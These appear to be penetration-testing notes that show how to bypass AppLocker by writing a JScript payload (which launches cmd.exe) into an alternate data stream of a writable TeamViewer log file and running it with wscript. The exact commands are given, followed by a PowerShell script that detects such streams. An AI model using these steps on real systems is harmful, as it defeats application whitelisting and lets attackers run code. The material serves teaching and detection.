Alternate data streams

Test with test.js

var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");

If we can find a file in a trusted location that is both writable and executable, we can write the contents of this script to an alternate data stream inside that file and execute it from there, bypassing AppLocker.

type test.js > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:test.js"

Confirm

dir /r "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log"

TeamViewer12_Logfile.log:test.js:$DATA

Execute

wscript "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:test.js"
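To check a host for streams planted this way, the following PowerShell lists every named data stream on files under the trusted directories and marks stream names that look like scripts or binaries. It is an added example, not part of the original notes. The root directories, the extension list and the function name Get-NamedStream are assumptions to adjust to your own AppLocker policy.

```powershell
# Added example: enumerate alternate data streams under AppLocker-trusted roots.
# Assumption: the policy trusts Program Files and the Windows directory by path;
# replace $roots with the paths your own rules allow.
$roots = @($env:ProgramFiles, ${env:ProgramFiles(x86)}, $env:windir) |
    Where-Object { $_ -and (Test-Path -LiteralPath $_) }

# Assumption: stream names ending in these extensions deserve a closer look.
$scriptExt = '\.(js|jse|vbs|vbe|wsf|wsh|hta|ps1|bat|cmd|exe|dll)$'

function Get-NamedStream {
    param([Parameter(Mandatory)][string[]]$Path)

    # -File: Windows PowerShell 5.1 can only read streams on files, not directories.
    Get-ChildItem -LiteralPath $Path -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue |
                # ':$DATA' is the normal file content; Zone.Identifier is the
                # Mark-of-the-Web stream that browsers add to downloads.
                Where-Object { $_.Stream -ne ':$DATA' -and $_.Stream -ne 'Zone.Identifier' }
        } |
        Select-Object FileName, Stream, Length,
            @{ Name = 'LooksExecutable'; Expression = { $_.Stream -match $scriptExt } }
}

# Report, with script-like stream names first.
Get-NamedStream -Path $roots |
    Sort-Object LooksExecutable -Descending |
    Format-Table -AutoSize
```

A file written as in the steps above would show up with Stream set to test.js and LooksExecutable set to True. Run it elevated so that access-denied files are not silently skipped.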
